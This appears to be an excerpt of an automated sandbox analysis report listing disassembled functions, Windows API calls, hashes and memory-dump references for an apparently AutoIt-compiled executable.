        • API ID: ItemMenu$Info_wcslen$Default
        • String ID: 0
        • API String ID: 1227352736-4108050209
        • Opcode ID: 839435e90ce42a9d771e822575c8e579d5e0a53da69ff2c1d8b64b99c60a5591
        • Instruction ID: 3873f11aee4e533d84910c42d828664d095b8bc883f1dc34c5e55fd58d002a8f
        • Opcode Fuzzy Hash: 839435e90ce42a9d771e822575c8e579d5e0a53da69ff2c1d8b64b99c60a5591
        • Instruction Fuzzy Hash: 3F5113716263029BD7989F2CC884B6BB7E8AF85314F240A2DF595D31E1DB70D824CF52
        APIs
        • ShellExecuteExW.SHELL32(0000003C), ref: 0026AEA3
          • Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625
        • GetProcessId.KERNEL32(00000000), ref: 0026AF38
        • CloseHandle.KERNEL32(00000000), ref: 0026AF67
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CloseExecuteHandleProcessShell_wcslen
        • String ID: <$@
        • API String ID: 146682121-1426351568
        • Opcode ID: 00d1cccfa896738602d7100bdab46f13eecd835e1432b47b8229199794dccf4e
        • Instruction ID: 2000cf8d5815d2cbb7b77115073832d653fcc8cf483ceea09c74c2547f204092
        • Opcode Fuzzy Hash: 00d1cccfa896738602d7100bdab46f13eecd835e1432b47b8229199794dccf4e
        • Instruction Fuzzy Hash: 53717870A10A59DFCB14DF65D484A9EBBF0BF08304F1484A9E816AB392C771ED95CF91
        APIs
        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00247206
        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0024723C
        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0024724D
        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002472CF
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorMode$AddressCreateInstanceProc
        • String ID: DllGetClassObject
        • API String ID: 753597075-1075368562
        • Opcode ID: 747d8c71fe9305b8acbf8c7cc1f258624bc6eb7e8a4f87a4660abab51cc0a708
        • Instruction ID: 9d52515709f1ee838c75a29bfc7f3e5f63e84bd77b654f9c04eda5de464b5bbe
        • Opcode Fuzzy Hash: 747d8c71fe9305b8acbf8c7cc1f258624bc6eb7e8a4f87a4660abab51cc0a708
        • Instruction Fuzzy Hash: F1416F71A14205EFDB19CF64C884A9A7BB9EF45310F2480AEFD199F20AD7F1D954CBA0
        APIs
        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00273E35
        • IsMenu.USER32(?), ref: 00273E4A
        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00273E92
        • DrawMenuBar.USER32 ref: 00273EA5
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Menu$Item$DrawInfoInsert
        • String ID: 0
        • API String ID: 3076010158-4108050209
        • Opcode ID: d4b60f74aee13a15eb3cbd126eef16aa429e3c520ba9d5c115f015dc78313716
        • Instruction ID: 9316eb07f8a139904175d1b784cb92a08cd982e2408fb59a413f9190aa2bb43a
        • Opcode Fuzzy Hash: d4b60f74aee13a15eb3cbd126eef16aa429e3c520ba9d5c115f015dc78313716
        • Instruction Fuzzy Hash: 23415D75A2120AEFDB10DF60D884EEAB7B5FF48354F148119F909A7250D730AE64DF50
        APIs
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
          • Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA
        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00241E66
        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00241E79
        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00241EA9
          • Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$_wcslen$ClassName
        • String ID: ComboBox$ListBox
        • API String ID: 2081771294-1403004172
        • Opcode ID: 45ef0718b9d679642893fb9ad0650833a46f4aa7087e1e9dceafa5d94da43888
        • Instruction ID: cadb2da740fbbafff744e19d432966b176051d819dfc7a4b3a020b9e43b07b27
        • Opcode Fuzzy Hash: 45ef0718b9d679642893fb9ad0650833a46f4aa7087e1e9dceafa5d94da43888
        • Instruction Fuzzy Hash: 14213575A10108BADB1CAFB1DC85CFFB7B8EF52350B10451DF825A71E1DB7449AA8620
        APIs
        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00272F8D
        • LoadLibraryW.KERNEL32(?), ref: 00272F94
        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00272FA9
        • DestroyWindow.USER32(?), ref: 00272FB1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$DestroyLibraryLoadWindow
        • String ID: SysAnimate32
        • API String ID: 3529120543-1011021900
        • Opcode ID: ded6533a3bff734771643563edccb9f9786fc0c9e3f49d13db6b787343bad965
        • Instruction ID: 1693045bce21e30e942906fdce7c46700dfc1882b864b0df7a739f3590f02586
        • Opcode Fuzzy Hash: ded6533a3bff734771643563edccb9f9786fc0c9e3f49d13db6b787343bad965
        • Instruction Fuzzy Hash: 6621CD72220206EBEF104F74EC84EBB37BDEB59364F208618F958D2590D771DCA59B61
        APIs
        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00204D1E,00000003,?,00204CBE,00000003,002A88B8,0000000C,00204E15,00000003,00000002), ref: 00204D8D
        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00204DA0
        • FreeLibrary.KERNEL32(00000000,?,?,?,00204D1E,00000003,?,00204CBE,00000003,002A88B8,0000000C,00204E15,00000003,00000002,00000000), ref: 00204DC3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: fd3a42cce834fd329c3905e795017466f2f6c751ac9a7044a502a448fb06bcfe
        • Instruction ID: 1c9795e89308c508fb70fe9f78414f51f3a513965a82a77b421135931b9d7990
        • Opcode Fuzzy Hash: fd3a42cce834fd329c3905e795017466f2f6c751ac9a7044a502a448fb06bcfe
        • Instruction Fuzzy Hash: 3BF0AF74A10309BBDB15AFA0EC4DBADBBB4EF04711F1040A8F909A22A1CB305A90CBD0
        APIs
        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E9C
        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001E4EAE
        • FreeLibrary.KERNEL32(00000000,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4EC0
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Library$AddressFreeLoadProc
        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
        • API String ID: 145871493-3689287502
        • Opcode ID: b871ca40c641240fefcd07e6937535791e39dc8b6fd0a91954be2cf989e97701
        • Instruction ID: 0bb6d19b53c21807b016a08ea8554dc0bf334f156269c682a454553e7b73a8f0
        • Opcode Fuzzy Hash: b871ca40c641240fefcd07e6937535791e39dc8b6fd0a91954be2cf989e97701
        • Instruction Fuzzy Hash: F0E0CD35E019625BD2351B367C1CB5FA654AFC2F62B550129FD0DD2100DF64CD4185B4
        APIs
        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E62
        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001E4E74
        • FreeLibrary.KERNEL32(00000000,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E87
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Library$AddressFreeLoadProc
        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
        • API String ID: 145871493-1355242751
        • Opcode ID: 8a03b40a47a054c1eac7a4b8f38fb1078c8ecceac9d51e75a9c2756acd27e115
        • Instruction ID: 40c7b767b20d2e0bbe622d5491b5e81970dd5d8e14b159b351b7556fda02ab65
        • Opcode Fuzzy Hash: 8a03b40a47a054c1eac7a4b8f38fb1078c8ecceac9d51e75a9c2756acd27e115
        • Instruction Fuzzy Hash: F7D0C231902A615766221B367C0CD8FAA18AF8AB113590128B80CA2110CF24CD41C5E0
        APIs
        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00252C05
        • DeleteFileW.KERNEL32(?), ref: 00252C87
        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00252C9D
        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00252CAE
        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00252CC0
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: File$Delete$Copy
        • String ID:
        • API String ID: 3226157194-0
        • Opcode ID: d8f24d14bdc41d1c27e413fb2314471742543b0892af0f72c93703c293f384a3
        • Instruction ID: fbc76302b003c629295783e568c8fef5d4b37eabd4a157aef20d15f34136e7d6
        • Opcode Fuzzy Hash: d8f24d14bdc41d1c27e413fb2314471742543b0892af0f72c93703c293f384a3
        • Instruction Fuzzy Hash: 9CB17071D10119ABDF11DFA4CC85EDEB7BDEF09345F1040A6F909E6182EB309A588F65
        APIs
        • GetCurrentProcessId.KERNEL32 ref: 0026A427
        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0026A435
        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0026A468
        • CloseHandle.KERNEL32(?), ref: 0026A63D
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Process$CloseCountersCurrentHandleOpen
        • String ID:
        • API String ID: 3488606520-0
        • Opcode ID: cedfaa77d65355bce1bb2083d82dfdd8c8ef4798ecaf2707703ae606b04c2eea
        • Instruction ID: 51178ac25867babbcd5fb00a0a3ba0703d0fa32368f267b45819950f8f8a4cdb
        • Opcode Fuzzy Hash: cedfaa77d65355bce1bb2083d82dfdd8c8ef4798ecaf2707703ae606b04c2eea
        • Instruction Fuzzy Hash: DFA1C0716047019FD720DF28D886F2AB7E5AF98714F14885DF55A9B3D2DBB0EC418B82
        APIs
        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00283700), ref: 0021BB91
        • WideCharToMultiByte.KERNEL32(00000000,00000000,002B121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0021BC09
        • WideCharToMultiByte.KERNEL32(00000000,00000000,002B1270,000000FF,?,0000003F,00000000,?), ref: 0021BC36
        • _free.LIBCMT ref: 0021BB7F
          • Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
          • Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0
        • _free.LIBCMT ref: 0021BD4B
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
        • String ID:
        • API String ID: 1286116820-0
        • Opcode ID: 2e906cc5803d071bce40931b7c7002640ea9b58cdc3d10d2e60079d6800bb1ba
        • Instruction ID: 80c6b3062db6d67072bf2c628772e885009a3ae645be3f1c9442a9257615f200
        • Opcode Fuzzy Hash: 2e906cc5803d071bce40931b7c7002640ea9b58cdc3d10d2e60079d6800bb1ba
        • Instruction Fuzzy Hash: AD511A71910219EFCB15EF65EC859EEB7F8EF60310B6002AAE424D7291DB305EF08B90
        APIs
          • Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0024CF22,?), ref: 0024DDFD
          • Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0024CF22,?), ref: 0024DE16
          • Part of subcall function 0024E199: GetFileAttributesW.KERNELBASE(?,0024CF95), ref: 0024E19A
        • lstrcmpiW.KERNEL32(?,?), ref: 0024E473
        • MoveFileW.KERNEL32(?,?), ref: 0024E4AC
        • _wcslen.LIBCMT ref: 0024E5EB
        • _wcslen.LIBCMT ref: 0024E603
        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0024E650
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
        • String ID:
        • API String ID: 3183298772-0
        • Opcode ID: bdfb672e6a1aa895b55423429248e64a5b4172882aeb60031cbddc8ebd9039a2
        • Instruction ID: 4db1a9b71bffe254ac68cf6d85f0994dcc329181e0f4ef443f6fa91542fb20dd
        • Opcode Fuzzy Hash: bdfb672e6a1aa895b55423429248e64a5b4172882aeb60031cbddc8ebd9039a2
        • Instruction Fuzzy Hash: D351B7B24183859BDB28EFA0DC819DF73DCAF94300F00491EF589D3191EF74A5988B56
        APIs
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
          • Part of subcall function 0026C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0026B6AE,?,?), ref: 0026C9B5
          • Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026C9F1
          • Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA68
          • Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA9E
        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026BAA5
        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0026BB00
        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0026BB63
        • RegCloseKey.ADVAPI32(?,?), ref: 0026BBA6
        • RegCloseKey.ADVAPI32(00000000), ref: 0026BBB3
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
        • String ID:
        • API String ID: 826366716-0
        • Opcode ID: 33ae96b976056b93da93921ceb1b5597cb6de0039e955ba1ece5ce88c0017c7c
        • Instruction ID: a76ad67e30069fe70515ff60a9684e8ddef1fc12386cb6679624b19f1b38bc30
        • Opcode Fuzzy Hash: 33ae96b976056b93da93921ceb1b5597cb6de0039e955ba1ece5ce88c0017c7c
        • Instruction Fuzzy Hash: C261C331218241EFD715DF64C494E2ABBE5FF84308F54895CF4998B2A2DB31ED85CB92
        APIs
        • VariantInit.OLEAUT32(?), ref: 00248BCD
        • VariantClear.OLEAUT32 ref: 00248C3E
        • VariantClear.OLEAUT32 ref: 00248C9D
        • VariantClear.OLEAUT32(?), ref: 00248D10
        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00248D3B
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Variant$Clear$ChangeInitType
        • String ID:
        • API String ID: 4136290138-0
        • Opcode ID: 86347be10ce78b280ec2bb59522a194d5cfc9006be7448ea108cd52231028178
        • Instruction ID: 64abf24ce24796e6d390738cd75facfbea772169c605c01928295f226d1b3f0f
        • Opcode Fuzzy Hash: 86347be10ce78b280ec2bb59522a194d5cfc9006be7448ea108cd52231028178
        • Instruction Fuzzy Hash: 85518D71A1121ADFCB14CF28C894AAAB7F4FF89314B118559E909DB350E730E911CF90
        APIs
        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00258BAE
        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00258BDA
        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00258C32
        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00258C57
        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00258C5F
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: PrivateProfile$SectionWrite$String
        • String ID:
        • API String ID: 2832842796-0
        • Opcode ID: c5bd0c6f8ef9a278f4e35cc42f8e6808df3ecfeef91f3b7375dfd445286587c7
        • Instruction ID: 07ef91a5aa33199d95349df5b1b526be100b0f059d3fdf11b3b686d405a592f3
        • Opcode Fuzzy Hash: c5bd0c6f8ef9a278f4e35cc42f8e6808df3ecfeef91f3b7375dfd445286587c7
        • Instruction Fuzzy Hash: B7517A35A00619AFDB04DF65D880E6EBBF5FF48314F088059E849AB3A2CB71ED51CB90
        APIs
        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00268F40
        • GetProcAddress.KERNEL32(00000000,?), ref: 00268FD0
        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00268FEC
        • GetProcAddress.KERNEL32(00000000,?), ref: 00269032
        • FreeLibrary.KERNEL32(00000000), ref: 00269052
          • Part of subcall function 001FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00251043,?,7529E610), ref: 001FF6E6
          • Part of subcall function 001FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0023FA64,00000000,00000000,?,?,00251043,?,7529E610,?,0023FA64), ref: 001FF70D
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
        • String ID:
        • API String ID: 666041331-0
        • Opcode ID: 394ac8c437b10af6d05d62e0482d212be39ed2f7b8427ae7f31f98454ec78109
        • Instruction ID: b3c63e4e98d2e6a21b7a30076347484a39101ec483842fb619e40388a9aad1db
        • Opcode Fuzzy Hash: 394ac8c437b10af6d05d62e0482d212be39ed2f7b8427ae7f31f98454ec78109
